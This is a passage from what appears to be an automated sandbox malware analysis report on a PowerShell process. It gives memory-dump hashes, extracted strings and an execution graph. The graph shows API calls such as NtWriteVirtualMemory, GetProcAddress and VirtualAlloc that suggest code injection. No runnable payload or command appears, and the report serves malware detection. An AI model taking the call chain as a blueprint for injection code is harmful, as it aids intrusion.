                                                                                                                                              • Instruction Fuzzy Hash: B9E0E532A04284AB870CD768E4808E9BFE19F88230F1584BFD4469B352CA325496C791
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e5491a5749d7f795fae7e17e4cfde761698851bc4081ef1a045eec7e94d190f9
                                                                                                                                              • Instruction ID: fb7d3e7f25516a7f8d326bd218c050651dc186573c67ace080876356e98e4ed6
                                                                                                                                              • Opcode Fuzzy Hash: e5491a5749d7f795fae7e17e4cfde761698851bc4081ef1a045eec7e94d190f9
                                                                                                                                              • Instruction Fuzzy Hash: 73E09A2670D2D11B8B16923D64A04AAAFB28ECB12031D81FBE084CF247C9928C46C7A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c48d1e2ae1932d28e7eb09610f6929c08a687206d576a808a07e009d4041300c
                                                                                                                                              • Instruction ID: 4574c305761beb860cb47d10f77e1c55d2a378561764a1fb740a5a3586a2aa9d
                                                                                                                                              • Opcode Fuzzy Hash: c48d1e2ae1932d28e7eb09610f6929c08a687206d576a808a07e009d4041300c
                                                                                                                                              • Instruction Fuzzy Hash: 21F06D749013044BD360DB78D4DD39ABBE9FB45324F00446DD21EC7340DB3968858B90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 043dd841957f82d250ffe5df1e90f3327e8dcbae475da4d83b88a913b3b3a937
                                                                                                                                              • Instruction ID: f00f61093219c818d238101dbdd957c13c7d8d3be1ff970750a8d6a5f9f31424
                                                                                                                                              • Opcode Fuzzy Hash: 043dd841957f82d250ffe5df1e90f3327e8dcbae475da4d83b88a913b3b3a937
                                                                                                                                              • Instruction Fuzzy Hash: 5FE0263930471457CB083778A44C2EE7A96EBC976CF00002ED60A87341CF385D0A93EA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d20b619ea3082fb33e3db7399552d5058ea432af819018647d80f5e1e265085d
                                                                                                                                              • Instruction ID: 82a9f83a44be0fa9472ea6b077d6878dddf9fb0515dfae8a9c7d0365b0814dc7
                                                                                                                                              • Opcode Fuzzy Hash: d20b619ea3082fb33e3db7399552d5058ea432af819018647d80f5e1e265085d
                                                                                                                                              • Instruction Fuzzy Hash: C3D05E16782222174558F6FE58006BBA1CF8BCD5A174A00379A09CB381EF40CC018BFD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5d6427cfb3a2cbbf30a75ccbf25ac0cdeb20837292cb3e228bcdf2a362d1dd8d
                                                                                                                                              • Instruction ID: dd4d5ce1e892bc3910d869885804456bf6240959c09b7393f87b5cbb289bbdae
                                                                                                                                              • Opcode Fuzzy Hash: 5d6427cfb3a2cbbf30a75ccbf25ac0cdeb20837292cb3e228bcdf2a362d1dd8d
                                                                                                                                              • Instruction Fuzzy Hash: 5EE08C35300B144B8615A62EB82089F7ADFEFC8665314452EE04987380DF64D8068BEA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                              • Instruction ID: befa4e5d6b1378c1a8d2ddae4c1536208cedf3c81325d89335dcf009530a97ce
                                                                                                                                              • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                              • Instruction Fuzzy Hash: 37E08631B00114978B08E799E4514D9F7A5DFCC220F04847ED91AA7380DB3269568BA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4f9cb33bed82a0f0d1517eb1bfd536f8e5d9b3bc6bcac1dd0df149b840fb91d1
                                                                                                                                              • Instruction ID: 5af1b2e388ef77a5544204fb6b548554afe81c1c5a8e36c20a85261a56c1fa3c
                                                                                                                                              • Opcode Fuzzy Hash: 4f9cb33bed82a0f0d1517eb1bfd536f8e5d9b3bc6bcac1dd0df149b840fb91d1
                                                                                                                                              • Instruction Fuzzy Hash: BAE04F319041499BCF09BBB4E89A4EDBFB0EE15315F40019DD95652592DA61198ACBC0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e181433a4c95a3be4beac521e0170d9ebb9f5e72667db762982c8f920c0a51a8
                                                                                                                                              • Instruction ID: bffcb736febfc02f23ad2ad096aa0abe043a4b500e9b819289b8293e42afbcd7
                                                                                                                                              • Opcode Fuzzy Hash: e181433a4c95a3be4beac521e0170d9ebb9f5e72667db762982c8f920c0a51a8
                                                                                                                                              • Instruction Fuzzy Hash: FDE09270D082496F8B50EFBC880186AFFF09B49214F6482AE9959D7352E7329903CFC0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8016861bf677693c519b3a3abc404680e827a8544fe50cf2680a3606c5e869a1
                                                                                                                                              • Instruction ID: b3e8259d77caa1a7fa75b5f7762704621e0f6d6d27b923aafa5a14498bfb371a
                                                                                                                                              • Opcode Fuzzy Hash: 8016861bf677693c519b3a3abc404680e827a8544fe50cf2680a3606c5e869a1
                                                                                                                                              • Instruction Fuzzy Hash: 08E048359082465BCB49DFB8E08646EBFF0DF55214F10419ED94597203D6314486DF81
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                              • Instruction ID: 972153051e84fa84e83e93bf1a1a3eba662f148024189970e11665535e28579e
                                                                                                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                              • Instruction Fuzzy Hash: 1CD067B0D042099F8784EFADD94156EFBF4EB48210F6085AA8919E7301E7329A52CFD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d393abf53c003b98eb3074ff26e337d6ce18702afe0ba98e0e485d9475b65b47
                                                                                                                                              • Instruction ID: 84dfc8b106b90339304adae03fe2a7aa0dab5896c6260fabd3e808285319478b
                                                                                                                                              • Opcode Fuzzy Hash: d393abf53c003b98eb3074ff26e337d6ce18702afe0ba98e0e485d9475b65b47
                                                                                                                                              • Instruction Fuzzy Hash: D6D042318041098B8F08BBA4E89A4ADBB74EA14205F40416DDA1652591AA311A5ADEC5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 409db41de94df251e690753ec9bb4aa695fffc760567c0fefe40f2e231338a9b
                                                                                                                                              • Instruction ID: ef2afc723cd53f6d6a03bb166e25645c3af431928b40be284a6836cb7f5d3e7b
                                                                                                                                              • Opcode Fuzzy Hash: 409db41de94df251e690753ec9bb4aa695fffc760567c0fefe40f2e231338a9b
                                                                                                                                              • Instruction Fuzzy Hash: 71D01734E0820A8B8B48EFA4E48686EBBB4EB48204F008169DD0993340EA305846DFC1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ad3f47014f5401d4a0da341b1309a79dba08006e420ccde3538d59e4da876d68
                                                                                                                                              • Instruction ID: 2789beaadf5b1a6755ae009d766aaacbbdcaea2336d71ab89f9ea7c4c37a378b
                                                                                                                                              • Opcode Fuzzy Hash: ad3f47014f5401d4a0da341b1309a79dba08006e420ccde3538d59e4da876d68
                                                                                                                                              • Instruction Fuzzy Hash: 84D092345093848FC71ADF74D4A48503F71EF4B21935608DEE04A8F6F2DB35A44ADB15
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f1ab269e8b19743b32a1a5a848d8891eb66c162cca8dd81108215e53c15dd3ac
                                                                                                                                              • Instruction ID: e172301db673fdb4af81b3b789ee1baef63c40035e0e05f7158a63fa419c93fb
                                                                                                                                              • Opcode Fuzzy Hash: f1ab269e8b19743b32a1a5a848d8891eb66c162cca8dd81108215e53c15dd3ac
                                                                                                                                              • Instruction Fuzzy Hash: 07C08C309087804FEF06CB318CB64113F71DE9720030705C3DE028B8B2DD249809D741
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9489a319db78e4f26ac8bc5de1d3eaf45dda377ed67aa9bfc8ccd7ceff2346b2
                                                                                                                                              • Instruction ID: a08524e0cf37574d708d987c8819bcf2d767ed776123c5dce28b410574f2526a
                                                                                                                                              • Opcode Fuzzy Hash: 9489a319db78e4f26ac8bc5de1d3eaf45dda377ed67aa9bfc8ccd7ceff2346b2
                                                                                                                                              • Instruction Fuzzy Hash: F4B0923004870C8FC2586F79A8448147329EB4621938004ECE90E4A6928E3AE88ACA45
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2323119219.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: fbq$`Q]q$`Q]q$`Q]q$`Q]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                              • API String ID: 0-4154959921
                                                                                                                                              • Opcode ID: 04e76a1a1de718fa4e09ccbb2aa65f1f09148479bb65d5ce88683b9d3edc5a29
                                                                                                                                              • Instruction ID: 0f327c0333fd4ea608a1f734b0215d9686d2b5acb4724c797e58833cc4467298
                                                                                                                                              • Opcode Fuzzy Hash: 04e76a1a1de718fa4e09ccbb2aa65f1f09148479bb65d5ce88683b9d3edc5a29
                                                                                                                                              • Instruction Fuzzy Hash: 75B1E5B068121EEFCF18CF58C940AAA7BFABF45305F144865E8019B291DB75DC51CBE1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2323119219.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                                                                                              • API String ID: 0-2353078639
                                                                                                                                              • Opcode ID: d236979f14765d059742ff0ec6ef311e70b88de38bd0480bc120b7d6a36f0158
                                                                                                                                              • Instruction ID: 0ad3b96c475f3a491fb8436b862adad8971e8db99ce5f34865056064cb6887c5
                                                                                                                                              • Opcode Fuzzy Hash: d236979f14765d059742ff0ec6ef311e70b88de38bd0480bc120b7d6a36f0158
                                                                                                                                              • Instruction Fuzzy Hash: 065156B1706306AFDB245A6D8800766BBBAEFC2765F24842BD845CB341DA35C885C7E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: `^q$`^q$`^q$`^q
                                                                                                                                              • API String ID: 0-4294711580
                                                                                                                                              • Opcode ID: 334adadba694f5a6c793859268907bc32ef311b632c7ee8f6635494cebbd896c
                                                                                                                                              • Instruction ID: 7af7c3cb301a456173c9eabb933eb625e4e3444197382bac13b17ef05e2af8d8
                                                                                                                                              • Opcode Fuzzy Hash: 334adadba694f5a6c793859268907bc32ef311b632c7ee8f6635494cebbd896c
                                                                                                                                              • Instruction Fuzzy Hash: E0B1A574E012099FCB54DFA9D990A9DFBF6FF88300F248629D819AB354DB34A945CF90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: `^q$`^q$`^q$`^q
                                                                                                                                              • API String ID: 0-4294711580
                                                                                                                                              • Opcode ID: f96587213cc792e779460d5f979856110ae2d99f2f4f44b6924b874871316927
                                                                                                                                              • Instruction ID: a71f85ba7be115658c0c518f4d75ba3f76da2aa4a118f9423e29b6ff1c33bd00
                                                                                                                                              • Opcode Fuzzy Hash: f96587213cc792e779460d5f979856110ae2d99f2f4f44b6924b874871316927
                                                                                                                                              • Instruction Fuzzy Hash: CDB1A574E012099FCB54DFA9D990A9DFBF6FF88300F248629D819AB354DB34A945CF90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: `^q$`^q$`^q$`^q
                                                                                                                                              • API String ID: 0-4294711580
                                                                                                                                              • Opcode ID: c81bd4ff1d1e03dd3381e0360c24ab6a929deb8493037178391ddeff6d4f25fe
                                                                                                                                              • Instruction ID: d3d417511064893c75625dbbf59601da2c37a81da3973a33fa720d017c5b20c6
                                                                                                                                              • Opcode Fuzzy Hash: c81bd4ff1d1e03dd3381e0360c24ab6a929deb8493037178391ddeff6d4f25fe
                                                                                                                                              • Instruction Fuzzy Hash: 21919374E012199FCB54DFA9D990A9DFBF5FF48300F20862AE819AB354E734A945CF90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2323119219.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $]q$$]q$$]q$$]q
                                                                                                                                              • API String ID: 0-858218434
                                                                                                                                              • Opcode ID: 85be3ec1dcc82205bd068a987fdb44e8f9653009c0e6409993d0779c31a22131
                                                                                                                                              • Instruction ID: 27e669a1358a714d54c0d9457e404c94e65dbdd3443ef3cee471c889e3721450
                                                                                                                                              • Opcode Fuzzy Hash: 85be3ec1dcc82205bd068a987fdb44e8f9653009c0e6409993d0779c31a22131
                                                                                                                                              • Instruction Fuzzy Hash: A9216BB1315306BBDB38552E9840B2BB7DFAFC0719F25883AA905CB381DD75C850C3A1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2323119219.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q$$]q$$]q
                                                                                                                                              • API String ID: 0-978391646
                                                                                                                                              • Opcode ID: 5a5dc9a32eee7eac5dcd2e99eda6a0a9177c9f117607942ca75b0c5da16cc7d9
                                                                                                                                              • Instruction ID: 0dcbe0329fd3aca23db91b5bf85c7668021e793882554a0845ded98344de0a3c
                                                                                                                                              • Opcode Fuzzy Hash: 5a5dc9a32eee7eac5dcd2e99eda6a0a9177c9f117607942ca75b0c5da16cc7d9
                                                                                                                                              • Instruction Fuzzy Hash: 9111AFB1F0A7526FC72E523C5970379ABAE9FC5554F1D05E6C081CB262ED188C0283D7

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:9.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:187
                                                                                                                                              Total number of Limit Nodes:17
                                                                                                                                              execution_graph 24319 285bb44 24322 284ec74 24319->24322 24323 284ec7c 24322->24323 24323->24323 26677 284870c LoadLibraryW 24323->26677 24325 284ec9e 24326 284eca3 24325->24326 24327 284ecad 24326->24327 24328 284ecb3 24327->24328 24329 284ecb7 24328->24329 24330 284ecc8 24328->24330 26691 2834500 24329->26691 24332 2834500 8 API calls 24330->24332 24333 284ecc6 24332->24333 26682 283480c 24333->26682 26697 28480c8 26677->26697 26679 2848745 26705 2847d00 26679->26705 26683 283481d 26682->26683 26684 2834843 26683->26684 26685 283485a 26683->26685 26686 2834b78 8 API calls 26684->26686 26687 2834570 8 API calls 26685->26687 26689 2834850 26686->26689 26687->26689 26688 283488b 26689->26688 26690 2834500 8 API calls 26689->26690 26690->26688 26692 2834504 26691->26692 26695 2834514 26691->26695 26694 2834570 8 API calls 26692->26694 26692->26695 26693 2834542 26693->24333 26694->26695 26695->26693 26696 2832c2c 8 API calls 26695->26696 26696->26693 26698 2834500 8 API calls 26697->26698 26699 28480ed 26698->26699 26716 2847914 26699->26716 26701 28480fa 26702 284811a GetProcAddress GetProcAddress 26701->26702 26720 28344d0 26702->26720 26706 2834500 8 API calls 26705->26706 26707 2847d25 26706->26707 26708 2847914 8 API calls 26707->26708 26709 2847d32 26708->26709 26758 2848020 26709->26758 26712 28480c8 10 API calls 26713 2847d5b NtWriteVirtualMemory 26712->26713 26714 28344d0 8 API calls 26713->26714 26715 2847d94 FreeLibrary 26714->26715 26715->24325 26717 2847925 26716->26717 26724 2834b78 26717->26724 26719 2847935 26719->26701 26722 28344d6 26720->26722 26721 28344fc 26721->26679 26722->26721 26723 2832c2c 8 API calls 26722->26723 26723->26722 26725 2834b85 26724->26725 26729 2834bb5 26724->26729 26728 2834b91 26725->26728 26730 2834570 26725->26730 26728->26719 26735 28344ac 26729->26735 26731 2834574 26730->26731 26732 2834598 26730->26732 26739 2832c10 26731->26739 26732->26729 26734 2834581 26734->26729 26736 28344b2 26735->26736 26737 28344cd 26735->26737 26736->26737 26749 2832c2c 26736->26749 26737->26728 26740 2832c27 26739->26740 26742 2832c14 26739->26742 26740->26734 26741 2832c1e 26741->26734 26742->26741 26743 2832d19 26742->26743 26747 28364cc TlsGetValue 26742->26747 26748 2832ce8 7 API calls 26743->26748 26746 2832d3a 26746->26734 26747->26743 26748->26746 26750 2832c3a 26749->26750 26751 2832c30 26749->26751 26750->26737 26751->26750 26752 2832d19 26751->26752 26756 28364cc TlsGetValue 26751->26756 26757 2832ce8 7 API calls 26752->26757 26755 2832d3a 26755->26737 26756->26752 26757->26755 26759 2834500 8 API calls 26758->26759 26760 2848043 26759->26760 26761 2847914 8 API calls 26760->26761 26762 2848050 26761->26762 26763 28480c8 10 API calls 26762->26763 26764 2848069 GetModuleHandleA 26763->26764 26765 28344ac 8 API calls 26764->26765 26766 2847d55 26765->26766 26766->26712 26767 2831727 26768 2831968 26767->26768 26769 283173c 26767->26769 26770 2831938 26768->26770 26771 2831a80 26768->26771 26778 283174e 26769->26778 26782 28317cb Sleep 26769->26782 26777 2831947 Sleep 26770->26777 26783 2831986 26770->26783 26773 2831684 VirtualAlloc 26771->26773 26774 2831a89 26771->26774 26772 283175d 26775 28316bf 26773->26775 26776 28316af 26773->26776 26791 2831644 26776->26791 26781 283195d Sleep 26777->26781 26777->26783 26778->26772 26779 283182c 26778->26779 26784 283180a Sleep 26778->26784 26790 2831838 26779->26790 26797 28315cc 26779->26797 26781->26770 26782->26778 26785 28317e4 Sleep 26782->26785 26786 28315cc VirtualAlloc 26783->26786 26789 28319a4 26783->26789 26784->26779 26787 2831820 Sleep 26784->26787 26785->26769 26786->26789 26787->26778 26792 2831681 26791->26792 26793 283164d 26791->26793 26792->26775 26793->26792 26794 283164f Sleep 26793->26794 26795 2831664 26794->26795 26795->26792 26796 2831668 Sleep 26795->26796 26796->26793 26801 2831560 26797->26801 26799 28315d4 VirtualAlloc 26800 28315eb 26799->26800 26800->26790 26802 2831500 26801->26802 26802->26799 26803 285bb50 timeSetEvent 26804 2834e88 26805 2834e95 26804->26805 26808 2834e9c 26804->26808 26810 2834be4 26805->26810 26813 2834bfc 26808->26813 26811 2834bdc 26810->26811 26812 2834be8 SysAllocStringLen 26810->26812 26811->26808 26812->26811 26814 2834c02 SysFreeString 26813->26814 26815 2834c08 26813->26815 26814->26815 26816 2836518 26817 2836523 26816->26817 26820 2834168 26817->26820 26819 283655d 26821 28341ae 26820->26821 26822 283422c 26821->26822 26832 2834100 26821->26832 26822->26819 26824 28343e9 26822->26824 26827 28343fa 26822->26827 26837 283432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 26824->26837 26826 28343f3 26826->26827 26828 283443f FreeLibrary 26827->26828 26829 2834463 26827->26829 26828->26827 26830 2834472 ExitProcess 26829->26830 26831 283446c 26829->26831 26831->26830 26833 2834143 26832->26833 26834 2834110 26832->26834 26833->26822 26834->26833 26836 28315cc VirtualAlloc 26834->26836 26838 2835814 26834->26838 26836->26834 26837->26826 26839 2835824 GetModuleFileNameA 26838->26839 26841 2835840 26838->26841 26842 2835a78 GetModuleFileNameA RegOpenKeyExA 26839->26842 26841->26834 26843 2835afb 26842->26843 26844 2835abb RegOpenKeyExA 26842->26844 26860 28358b4 6 API calls 26843->26860 26844->26843 26845 2835ad9 RegOpenKeyExA 26844->26845 26845->26843 26847 2835b84 lstrcpyn GetThreadLocale GetLocaleInfoA 26845->26847 26849 2835bbb 26847->26849 26850 2835c9e 26847->26850 26848 2835b20 RegQueryValueExA 26851 2835b62 RegCloseKey 26848->26851 26852 2835b40 RegQueryValueExA 26848->26852 26849->26850 26853 2835bcb lstrlen 26849->26853 26850->26841 26851->26841 26852->26851 26854 2835b5e 26852->26854 26855 2835be3 26853->26855 26854->26851 26855->26850 26856 2835c08 lstrcpyn LoadLibraryExA 26855->26856 26857 2835c30 26855->26857 26856->26857 26857->26850 26858 2835c3a lstrcpyn LoadLibraryExA 26857->26858 26858->26850 26859 2835c6c lstrcpyn LoadLibraryExA 26858->26859 26859->26850 26860->26848 26861 2834c48 26862 2834c0c 26861->26862 26864 2834bdc 26861->26864 26863 2834c12 SysFreeString 26862->26863 26862->26864 26863->26864 26865 2831a8f 26866 2831aa1 26865->26866 26867 2831b6c 26865->26867 26869 2831aa7 26866->26869 26872 2831b13 Sleep 26866->26872 26868 28316e8 26867->26868 26867->26869 26871 2831c66 26868->26871 26873 2831644 2 API calls 26868->26873 26870 2831ab0 26869->26870 26875 2831b4b Sleep 26869->26875 26879 2831b81 26869->26879 26872->26869 26874 2831b2d Sleep 26872->26874 26876 28316f5 VirtualFree 26873->26876 26874->26866 26877 2831b61 Sleep 26875->26877 26875->26879 26878 283170d 26876->26878 26877->26869 26880 2831c00 VirtualFree 26879->26880 26881 2831ba4 26879->26881

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
